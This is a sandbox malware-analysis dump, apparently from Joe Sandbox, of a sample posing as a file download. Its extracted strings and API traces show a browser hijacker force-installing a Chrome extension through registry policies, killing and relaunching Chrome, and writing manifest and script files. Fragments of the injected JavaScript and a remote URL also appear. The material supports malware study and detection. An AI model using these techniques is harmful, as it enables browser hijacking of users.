__crtLCMapStringA_stat 66 API calls 10931->10932 10934 9146fc __close 10931->10934 10932->10930 10936 91462e 10933->10936 10937 9163b9 __crtLCMapStringA_stat 66 API calls 10933->10937 10935->10933 10938 9163b9 __crtLCMapStringA_stat 66 API calls 10936->10938 10942 91463c 10936->10942 10937->10936 10938->10942 10939 9163b9 __crtLCMapStringA_stat 66 API calls 10940 91464a 10939->10940 10941 914658 10940->10941 10943 9163b9 __crtLCMapStringA_stat 66 API calls 10940->10943 10944 914666 10941->10944 10945 9163b9 __crtLCMapStringA_stat 66 API calls 10941->10945 10942->10939 10942->10940 10943->10941 10946 914677 10944->10946 10948 9163b9 __crtLCMapStringA_stat 66 API calls 10944->10948 10945->10944 10947 9169cb __lock 66 API calls 10946->10947 10949 91467f 10947->10949 10948->10946 10950 9146a4 10949->10950 10951 91468b InterlockedDecrement 10949->10951 10965 914708 10950->10965 10951->10950 10952 914696 10951->10952 10952->10950 10955 9163b9 __crtLCMapStringA_stat 66 API calls 10952->10955 10955->10950 10956 9169cb __lock 66 API calls 10957 9146b8 10956->10957 10958 9146e9 10957->10958 10960 9160e5 ___removelocaleref 8 API calls 10957->10960 10968 914714 10958->10968 10963 9146cd 10960->10963 10962 9163b9 __crtLCMapStringA_stat 66 API calls 10962->10934 10963->10958 10964 915f0d ___freetlocinfo 66 API calls 10963->10964 10964->10958 10971 9168f1 LeaveCriticalSection 10965->10971 10967 9146b1 10967->10956 10972 9168f1 LeaveCriticalSection 10968->10972 10970 9146f6 10970->10962 10971->10967 10972->10970
        Strings
        • jdejdmchbgaciegdmifmnkopbdbfhcfb, xrefs: 00911B83
        • ExtensionInstallAllowlist, xrefs: 00911A93
        • %s\chrome.crx, xrefs: 00911E61
        • jdejdmchbgaciegdmifmnkopbdbfhcfb, xrefs: 0091207E
        • ExtensionInstallForcelist, xrefs: 00911AA5
        • SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist, xrefs: 009119A4
        • SOFTWARE\WOW6432Node\Google\Chrome\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb, xrefs: 00911EE3
        • Default, xrefs: 00911C6B
        • %s\Google\Chrome\User Data\%s\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb\1.0_0\src\jquery-3.5.1.min.js, xrefs: 0091200D
        • 1.0, xrefs: 00911EF7
        • SOFTWARE\Google\Chrome\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb, xrefs: 00911ADC
        • 1.0, xrefs: 00911EB9
        • version, xrefs: 00911EFC
        • SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist, xrefs: 00911A09
        • /IM chrome.exe, xrefs: 00911F1C
        • C:\Program Files, xrefs: 009118E9, 009118F6, 00911959
        • https://getfiles.wiki/welcome.php, xrefs: 00911BB0
        • SOFTWARE\WOW6432Node\Policies\Google\Chrome\ExtensionInstallForcelist, xrefs: 009120A1
        • SOFTWARE\Google\Chrome\Extensions, xrefs: 00911B5A
        • Profile , xrefs: 00911D0C
        • SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist, xrefs: 00912088
        • SOFTWARE\WOW6432Node\Google\Chrome\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb, xrefs: 00911F01
        • jdejdmchbgaciegdmifmnkopbdbfhcfb, xrefs: 00912097
        • /F /IM chrome.exe /T, xrefs: 009120CC
        • %s\ServiceApp\apps-helper, xrefs: 00911E41
        • SOFTWARE\Policies\Google\Chrome, xrefs: 00911A6A
        • version, xrefs: 00911B1D
        • --profile-directory="%s" --no-startup-window --load-extension="%s" --hide-crash-restore-bubble, xrefs: 00911F84
        • %s\Google\Chrome\Application\chrome.exe, xrefs: 0091195E
        • jdejdmchbgaciegdmifmnkopbdbfhcfb, xrefs: 00911E7B
        • open, xrefs: 00911BBC
        • %s\Google\Chrome\User Data\*.*, xrefs: 00911BF0, 00911BEF
        • open, xrefs: 00911FB0
        • path, xrefs: 00911EA0
        • path, xrefs: 00911B06
        • version, xrefs: 00911EBE
        • SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist, xrefs: 00911E85
        • SOFTWARE\Google\Chrome\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb, xrefs: 00911EC3
        • ============================, xrefs: 009117BC
        • %s\Google\Chrome\User Data\Default\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb, xrefs: 00911C37
        • path, xrefs: 00911EDE
        • %s\Google\Chrome\User Data\%s\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb, xrefs: 00911D3B
        • SOFTWARE\Google\Chrome\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb, xrefs: 00911EA5
        Memory Dump Source
        • Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
        • Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd
        Similarity
        • API ID:
        • String ID: --profile-directory="%s" --no-startup-window --load-extension="%s" --hide-crash-restore-bubble$ /F /IM chrome.exe /T$ /IM chrome.exe$ https://getfiles.wiki/welcome.php$%s\Google\Chrome\Application\chrome.exe$%s\Google\Chrome\User Data\%s\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb$%s\Google\Chrome\User Data\%s\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb\1.0_0\src\jquery-3.5.1.min.js$%s\Google\Chrome\User Data\*.*$%s\Google\Chrome\User Data\Default\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb$%s\ServiceApp\apps-helper$%s\chrome.crx$1.0$1.0$============================$C:\Program Files$Default$ExtensionInstallAllowlist$ExtensionInstallForcelist$Profile $SOFTWARE\Google\Chrome\Extensions$SOFTWARE\Google\Chrome\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb$SOFTWARE\Google\Chrome\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb$SOFTWARE\Google\Chrome\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb$SOFTWARE\Policies\Google\Chrome$SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist$SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist$SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist$SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist$SOFTWARE\WOW6432Node\Google\Chrome\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb$SOFTWARE\WOW6432Node\Google\Chrome\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb$SOFTWARE\WOW6432Node\Policies\Google\Chrome\ExtensionInstallForcelist$jdejdmchbgaciegdmifmnkopbdbfhcfb$jdejdmchbgaciegdmifmnkopbdbfhcfb$jdejdmchbgaciegdmifmnkopbdbfhcfb$jdejdmchbgaciegdmifmnkopbdbfhcfb$open$open$path$path$path$version$version$version
        • API String ID: 0-23166947
        • Opcode ID: 0138c68e91c83665595c3cdcfc068b388b69287fa27fbc2c111d3d9919f7c60b
        • Instruction ID: eecad149a296eac2eae7d62f068ccc093be2e9b45f5f6f062a5772ffd3cbc45d
        • Opcode Fuzzy Hash: 0138c68e91c83665595c3cdcfc068b388b69287fa27fbc2c111d3d9919f7c60b
        • Instruction Fuzzy Hash: B26214B5B4821DBBCB35AB649C49AECB77CEF64720F0447C9E629961E1E7704EC0CA11

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 390 911050-911064 GetModuleHandleW 391 911066 390->391 392 911069-911092 GetProcAddress * 2 390->392 391->392 393 911068 391->393 394 911094 392->394 395 911096-9110aa GetProcAddress 392->395 393->392 394->395 396 9110ac 395->396 397 9110af-9110c3 GetProcAddress 395->397 396->397 398 9110ae 396->398 399 9110c5 397->399 400 9110c8-9110dc GetProcAddress 397->400 398->397 399->400 401 9110c7 399->401 402 9110e1-9110f6 GetProcAddress 400->402 403 9110de 400->403 401->400 405 9110f8 402->405 406 9110fa-91110f GetProcAddress 402->406 403->402 404 9110e0 403->404 404->402 405->406 407 911111 406->407 408 911113-911127 GetProcAddress 406->408 407->408 409 911129 408->409 410 91112c-91113a LoadLibraryW 408->410 409->410 411 91112b 409->411 412 91113c 410->412 413 91113f-911153 GetProcAddress 410->413 411->410 412->413 414 91113e 412->414 415 911155 413->415 416 911158-91116c GetProcAddress 413->416 414->413 415->416 417 911157 415->417 418 911171-911185 GetProcAddress 416->418 419 91116e 416->419 417->416 421 911187 418->421 422 91118a-9111d4 GetProcAddress * 3 GetModuleHandleW 418->422 419->418 420 911170 419->420 420->418 421->422 423 911189 421->423 424 9111d6 422->424 425 9111d9-9111ed GetProcAddress 422->425 423->422 424->425 426 9111d8 424->426 427 9111f2-9111f6 425->427 428 9111ef 425->428 426->425 428->427 429 9111f1 428->429 429->427
        APIs
        • GetModuleHandleW.KERNEL32(KERNEL32.dll), ref: 0091105B
        • GetProcAddress.KERNEL32(?,LoadLibraryW), ref: 00911072
        • GetProcAddress.KERNEL32(?,CreateProcessW), ref: 00911086
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
        • Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd
        Similarity
        • API ID: AddressProc$HandleModule
        • String ID: @upu$ADVAPI32.dll$CopyFileW$CreateDirectoryW$CreateFileW$CreateProcessW$GetExitCodeProcess$GetModuleFileNameW$KERNEL32.dll$LoadLibraryW$RegCloseKey$RegCreateKeyExW$RegDeleteKeyW$RegDeleteValueW$RegOpenKeyExW$RegSetValueExW$SHELL32.dll$ShellExecuteW$WriteFile
        • API String ID: 667068680-1921577586
        • Opcode ID: 037d37f7a4dfdcb85655992cad360fb4a972d99f765459033dff44d99c52dcdb
        • Instruction ID: a70f45b9f13dd4b53d3a09b6105b99f42d21a378802ea02c0957a0fb65b77908
        • Opcode Fuzzy Hash: 037d37f7a4dfdcb85655992cad360fb4a972d99f765459033dff44d99c52dcdb
        • Instruction Fuzzy Hash: FE51AF75F1834CBBDB208BB4AD488EEBBB6AA493747004745EB31972D8D7708981DF15

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 430 911480-911493 431 911495 430->431 432 911498-9114b3 call 9120f0 430->432 431->432 433 911497 431->433 436 9114b5 432->436 437 9114b7-9114c7 432->437 433->432 436->437 439 9114c9 437->439 440 9114cb-9114e5 call 9120f0 437->440 439->440 444 9114e7 440->444 445 9114ea-9114f9 440->445 444->445 446 9114e9 444->446 448 9114fb 445->448 449 9114fe-911519 call 9120f0 445->449 446->445 448->449 450 9114fd 448->450 454 91151b 449->454 455 91151d-911542 449->455 450->449 454->455 457 911544 455->457 458 911547-91154e 455->458 457->458 459 911546 457->459 460 911550 458->460 461 911593 458->461 459->458 464 911552 460->464 465 911556-91157c call 911000 WriteFile 460->465 462 911595 461->462 463 911599-9115b5 call 9120f0 461->463 462->463 466 911597 462->466 477 9115b7 463->477 478 9115b9-9115df 463->478 464->465 467 911554 464->467 471 911581-91158e CloseHandle 465->471 472 91157e 465->472 466->463 467->465 471->461 476 911590 471->476 472->471 475 911580 472->475 475->471 476->461 479 911592 476->479 477->478 481 9115e1 478->481 482 9115e3-9115ea 478->482 479->461 481->482 483 9115ec 482->483 484 91162e 482->484 487 9115f1-911618 call 911000 WriteFile 483->487 488 9115ee 483->488 485 911630 484->485 486 911633-91164e call 9120f0 484->486 485->486 489 911632 485->489 495 911650 486->495 496 911653-911678 486->496 497 91161a 487->497 498 91161c-911629 CloseHandle 487->498 488->487 491 9115f0 488->491 489->486 491->487 495->496 500 911652 495->500 503 91167a 496->503 504 91167d-911684 496->504 497->498 498->484 499 91162b 498->499 499->484 502 91162d 499->502 500->496 502->484 503->504 505 91167c 503->505 506 911686 504->506 507 9116c9 504->507 505->504 510 911688 506->510 511 91168b-9116b1 call 911000 WriteFile 506->511 508 9116cb 507->508 509 9116ce-9116e8 call 9120f0 507->509 508->509 512 9116cd 508->512 523 9116ea 509->523 524 9116ed-911712 509->524 510->511 513 91168a 510->513 518 9116b3 511->518 519 9116b7-9116c4 CloseHandle 511->519 512->509 513->511 518->519 521 9116b5 518->521 519->507 525 9116c6 519->525 521->519 523->524 526 9116ec 523->526 529 911714 524->529 530 911717-91171e 524->530 525->507 527 9116c8 525->527 526->524 527->507 529->530 531 911716 529->531 532 911720 530->532 533 911762 530->533 531->530 536 911722 532->536 537 911725-91174b call 911000 WriteFile 532->537 534 911764 533->534 535 911768-911775 call 91213c 533->535 534->535 538 911766 534->538 536->537 540 911724 536->540 544 911750-91175d CloseHandle 537->544 545 91174d 537->545 538->535 540->537 544->533 546 91175f 544->546 545->544 547 91174f 545->547 546->533 548 911761 546->548 547->544 548->533
        Strings
        • {"name": "Apps","description": "","version": "1.0","manifest_version": 3,"background": {"service_worker": "service.js","type": "module"},"permissions": ["tabs", "scripting", "management", "background"],"host_permissions": ["chro, xrefs: 00911564
        • %s\ServiceApp\apps-helper\manifest.json, xrefs: 00911505, 00911504
        • %s\ServiceApp, xrefs: 0091149E
        • %s\ServiceApp\apps-helper\web.js, xrefs: 0091163A
        • @upu, xrefs: 009114C0, 009114F3
        • %s\ServiceApp\apps-helper, xrefs: 009114D2, 009114D1
        • chrome.management.onInstalled.addListener(info => {if (info.id != 'jdejdmchbgaciegdmifmnkopbdbfhcfb') return;setTimeout(() => {chrome.tabs.create({ url: 'chrome://policy' }, tab => {chrome.scripting.executeScript({target: { tabId: tab.id, xrefs: 009115FF
        • addEventListener('load', () => {if (location.host !== 'policy') return;const reload = () => {const button = document.querySelector('#reload-policies');if (button) {button.click();setTimeout(close, 200);} else {setTimeout(re, xrefs: 00911699
        • %s\ServiceApp\apps-helper\service.js, xrefs: 009115A1, 009115A0
        • %s\ServiceApp\apps-helper\chrome.crx, xrefs: 009116D5, 009116D4
        Memory Dump Source
        • Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
        • Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd
        Similarity
        • API ID:
        • String ID: %s\ServiceApp$%s\ServiceApp\apps-helper$%s\ServiceApp\apps-helper\chrome.crx$%s\ServiceApp\apps-helper\manifest.json$%s\ServiceApp\apps-helper\service.js$%s\ServiceApp\apps-helper\web.js$@upu$addEventListener('load', () => {if (location.host !== 'policy') return;const reload = () => {const button = document.querySelector('#reload-policies');if (button) {button.click();setTimeout(close, 200);} else {setTimeout(re$chrome.management.onInstalled.addListener(info => {if (info.id != 'jdejdmchbgaciegdmifmnkopbdbfhcfb') return;setTimeout(() => {chrome.tabs.create({ url: 'chrome://policy' }, tab => {chrome.scripting.executeScript({target: { tabId: tab.id${"name": "Apps","description": "","version": "1.0","manifest_version": 3,"background": {"service_worker": "service.js","type": "module"},"permissions": ["tabs", "scripting", "management", "background"],"host_permissions": ["chro
        • API String ID: 0-2288896630
        • Opcode ID: 4a73d55601b1f191e2edc18343b53b1f6dc0e4cd9fb5c7ba66548dd939ebfe2d
        • Instruction ID: 4a615f80d823e3eec9fd53b731d43252d79519dd820fb78c2a4eda89fccda30a
        • Opcode Fuzzy Hash: 4a73d55601b1f191e2edc18343b53b1f6dc0e4cd9fb5c7ba66548dd939ebfe2d
        • Instruction Fuzzy Hash: 81A1E570B9830CBBDB3097649C4AFE977296B54B20F084B84F335691E2DA715DC4DB25

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 549 911330-911336 550 911338 549->550 551 91133b-91134d 549->551 550->551 552 91133a 550->552 553 911353-91136a call 9157b0 551->553 554 91134f 551->554 552->551 558 91136c 553->558 559 91136f-911376 553->559 554->553 555 911351 554->555 555->553 558->559 560 91136e 558->560 561 911378 559->561 562 91137c-9113a5 CreateProcessW 559->562 560->559 561->562 565 911379 561->565 563 9113a7 562->563 564 9113aa-9113ae 562->564 563->564 566 9113a9 563->566 567 9113c0 564->567 568 9113b0 564->568 565->562 566->564 569 9113c2 567->569 570 9113c5-9113e2 WaitForSingleObject GetExitCodeProcess 567->570 571 9113b2 568->571 572 9113b5-9113b7 568->572 569->570 573 9113c4 569->573 574 9113e4 570->574 575 9113e7-9113f1 CloseHandle 570->575 571->572 576 9113b4 571->576 577 911424-911427 572->577 573->570 574->575 578 9113e6 574->578 579 9113f3 575->579 580 9113f6-911400 CloseHandle 575->580 576->572 578->575 579->580 581 9113f5 579->581 582 911402 580->582 583 911405-911409 580->583 581->580 582->583 584 911404 582->584 585 911419 583->585 586 91140b-91140c 583->586 584->583 589 91141b 585->589 590 91141f 585->590 587 911410-911412 586->587 588 91140e 586->588 587->577 588->587 589->590 591 91141d 589->591 590->577 591->590
        APIs
        • _memset.LIBCMT ref: 00911362
        • CreateProcessW.KERNELBASE(c:\windows\system32\taskkill.exe,?,00000000,00000000,00000000,08000020,00000000,00000000,00000044,00000000), ref: 0091139C
        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 009113CB
        • GetExitCodeProcess.KERNELBASE(00000000,?), ref: 009113D9
        • CloseHandle.KERNEL32(00000000), ref: 009113EB
        • CloseHandle.KERNEL32(?), ref: 009113FA
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
        • Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd
        Similarity
        • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWait_memset
        • String ID: D$c:\windows\system32\taskkill.exe
        • API String ID: 3666309416-2254422676
        • Opcode ID: 79cd08228f6de8cf5740e7ce2d3dc67b4e20dd907d7fbcbb579f4b960bc582cd
        • Instruction ID: 4af240fb119857bd02cb65c7a003735611b6424e22e1c0e8afeda974f020dc07
        • Opcode Fuzzy Hash: 79cd08228f6de8cf5740e7ce2d3dc67b4e20dd907d7fbcbb579f4b960bc582cd
        • Instruction Fuzzy Hash: 73412571B0828DBBDB209BF88C057ED7B78AB11724F08411AE7709A5EAD73058C2C712

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 592 9114f1-9114f9 594 9114fb 592->594 595 9114fe-911519 call 9120f0 592->595 594->595 596 9114fd 594->596 600 91151b 595->600 601 91151d-911542 595->601 596->595 600->601 603 911544 601->603 604 911547-91154e 601->604 603->604 605 911546 603->605 606 911550 604->606 607 911593 604->607 605->604 610 911552 606->610 611 911556-91157c call 911000 WriteFile 606->611 608 911595 607->608 609 911599-9115b5 call 9120f0 607->609 608->609 612 911597 608->612 623 9115b7 609->623 624 9115b9-9115df 609->624 610->611 613 911554 610->613 617 911581-91158e CloseHandle 611->617 618 91157e 611->618 612->609 613->611 617->607 622 911590 617->622 618->617 621 911580 618->621 621->617 622->607 625 911592 622->625 623->624 627 9115e1 624->627 628 9115e3-9115ea 624->628 625->607 627->628 629 9115ec 628->629 630 91162e 628->630 633 9115f1-911618 call 911000 WriteFile 629->633 634 9115ee 629->634 631 911630 630->631 632 911633-91164e call 9120f0 630->632 631->632 635 911632 631->635 641 911650 632->641 642 911653-911678 632->642 643 91161a 633->643 644 91161c-911629 CloseHandle 633->644 634->633 637 9115f0 634->637 635->632 637->633 641->642 646 911652 641->646 649 91167a 642->649 650 91167d-911684 642->650 643->644 644->630 645 91162b 644->645 645->630 648 91162d 645->648 646->642 648->630 649->650 651 91167c 649->651 652 911686 650->652 653 9116c9 650->653 651->650 656 911688 652->656 657 91168b-9116b1 call 911000 WriteFile 652->657 654 9116cb 653->654 655 9116ce-9116e8 call 9120f0 653->655 654->655 658 9116cd 654->658 669 9116ea 655->669 670 9116ed-911712 655->670 656->657 659 91168a 656->659 664 9116b3 657->664 665 9116b7-9116c4 CloseHandle 657->665 658->655 659->657 664->665 667 9116b5 664->667 665->653 671 9116c6 665->671 667->665 669->670 672 9116ec 669->672 675 911714 670->675 676 911717-91171e 670->676 671->653 673 9116c8 671->673 672->670 673->653 675->676 677 911716 675->677 678 911720 676->678 679 911762 676->679 677->676 682 911722 678->682 683 911725-91174b call 911000 WriteFile 678->683 680 911764 679->680 681 911768-911775 call 91213c 679->681 680->681 684 911766 680->684 682->683 686 911724 682->686 690 911750-91175d CloseHandle 683->690 691 91174d 683->691 684->681 686->683 690->679 692 91175f 690->692 691->690 693 91174f 691->693 692->679 694 911761 692->694 693->690 694->679
        APIs
        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00911536
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
        • Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd
        Similarity
        • API ID: CreateFile
        • String ID: %s\ServiceApp\apps-helper\manifest.json$@upu
        • API String ID: 823142352-3383513365
        • Opcode ID: f3102dd0dd8489205adb162d1ccdc1bd9d18f1ce37725d8d3dd96e023a7bcda4
        • Instruction ID: 9a312b1c6cd649241024de61e8914b167ceb3abad8768cf52a1e6ef9f55456d9
        • Opcode Fuzzy Hash: f3102dd0dd8489205adb162d1ccdc1bd9d18f1ce37725d8d3dd96e023a7bcda4
        • Instruction Fuzzy Hash: 8BF024B094D3896BDB3147284C4A39C7B74AF11B30F0A0BC0A261A55E3E23048C4DB22

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 695 911270-911276 696 911278 695->696 697 91127c-9112a8 call 911200 RegOpenKeyExW 695->697 696->697 699 91127a 696->699 702 9112aa 697->702 703 9112ad 697->703 699->697 702->703 704 9112ac 702->704 705 9112b2-9112be 703->705 706 9112af 703->706 704->703 708 9112c1-9112d4 705->708 706->705 707 9112b1 706->707 707->705 708->708 709 9112d6-911302 RegSetValueExW 708->709 710 911304 709->710 711 911307 709->711 710->711 714 911306 710->714 712 911309 711->712 713 91130c-91131a RegCloseKey 711->713 712->713 715 91130b 712->715 716 91131c 713->716 717 91131e-911326 713->717 714->711 715->713 716->717
        APIs
        • RegOpenKeyExW.KERNELBASE(?,?,00000000,000F003F,?,?,?), ref: 0091129F
        • RegSetValueExW.KERNELBASE(?,?,00000000,00000001,00000002,?), ref: 009112F9
        • RegCloseKey.KERNELBASE(?), ref: 00911310
        Memory Dump Source
        • Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
        • Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd
        Similarity
        • API ID: CloseOpenValue
        • String ID:
        • API String ID: 779948276-0
        • Opcode ID: 912b25a44995b457eec1c7436415c5eb8db19b01d383c40ba6b418eac2350e65
        • Instruction ID: 9b4b130768fb0f2e3fb5dac149e96b14910c70adfc40069597f667c30cd86bea
        • Opcode Fuzzy Hash: 912b25a44995b457eec1c7436415c5eb8db19b01d383c40ba6b418eac2350e65
        • Instruction Fuzzy Hash: D0216F75A0020DBFCF20DFE8C845AEEB7B8EF59310F144649FA14EB291D6719981CBA1
        APIs
        • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist,00000000,000F003F,?), ref: 009119AE
        Strings
        • SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist, xrefs: 009119A4
        Memory Dump Source
        • Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
        • Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd
        Similarity
        • API ID: Open
        • String ID: SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist
        • API String ID: 71445658-3928242555
        • Opcode ID: 4c6673b05172108a67ef49f1b1d36bdac816f95b74545700a5f6fe773a22fd96
        • Instruction ID: 68be019abae15b6449669d17af76b77c743428375b52ab8c663ac004fd385000
        • Opcode Fuzzy Hash: 4c6673b05172108a67ef49f1b1d36bdac816f95b74545700a5f6fe773a22fd96
        • Instruction Fuzzy Hash: EDE0D83050436BABC3219B605C5ABF8BA246F52711F188B85E224151E3C76009C0C696

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 986 9115aa-9115df 990 9115e1 986->990 991 9115e3-9115ea 986->991 990->991 992 9115ec 991->992 993 91162e 991->993 996 9115f1-911618 call 911000 WriteFile 992->996 997 9115ee 992->997 994 911630 993->994 995 911633-91164e call 9120f0 993->995 994->995 998 911632 994->998 1004 911650 995->1004 1005 911653-911678 995->1005 1006 91161a 996->1006 1007 91161c-911629 CloseHandle 996->1007 997->996 1000 9115f0 997->1000 998->995 1000->996 1004->1005 1009 911652 1004->1009 1012 91167a 1005->1012 1013 91167d-911684 1005->1013 1006->1007 1007->993 1008 91162b 1007->1008 1008->993 1011 91162d 1008->1011 1009->1005 1011->993 1012->1013 1014 91167c 1012->1014 1015 911686 1013->1015 1016 9116c9 1013->1016 1014->1013 1019 911688 1015->1019 1020 91168b-9116b1 call 911000 WriteFile 1015->1020 1017 9116cb 1016->1017 1018 9116ce-9116e8 call 9120f0 1016->1018 1017->1018 1021 9116cd 1017->1021 1032 9116ea 1018->1032 1033 9116ed-911712 1018->1033 1019->1020 1022 91168a 1019->1022 1027 9116b3 1020->1027 1028 9116b7-9116c4 CloseHandle 1020->1028 1021->1018 1022->1020 1027->1028 1030 9116b5 1027->1030 1028->1016 1034 9116c6 1028->1034 1030->1028 1032->1033 1035 9116ec 1032->1035 1038 911714 1033->1038 1039 911717-91171e 1033->1039 1034->1016 1036 9116c8 1034->1036 1035->1033 1036->1016 1038->1039 1040 911716 1038->1040 1041 911720 1039->1041 1042 911762 1039->1042 1040->1039 1045 911722 1041->1045 1046 911725-91174b call 911000 WriteFile 1041->1046 1043 911764 1042->1043 1044 911768-911775 call 91213c 1042->1044 1043->1044 1047 911766 1043->1047 1045->1046 1049 911724 1045->1049 1053 911750-91175d CloseHandle 1046->1053 1054 91174d 1046->1054 1047->1044 1049->1046 1053->1042 1055 91175f 1053->1055 1054->1053 1056 91174f 1054->1056 1055->1042 1057 911761 1055->1057 1056->1053 1057->1042
        APIs
        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 009115D2
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
        • Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
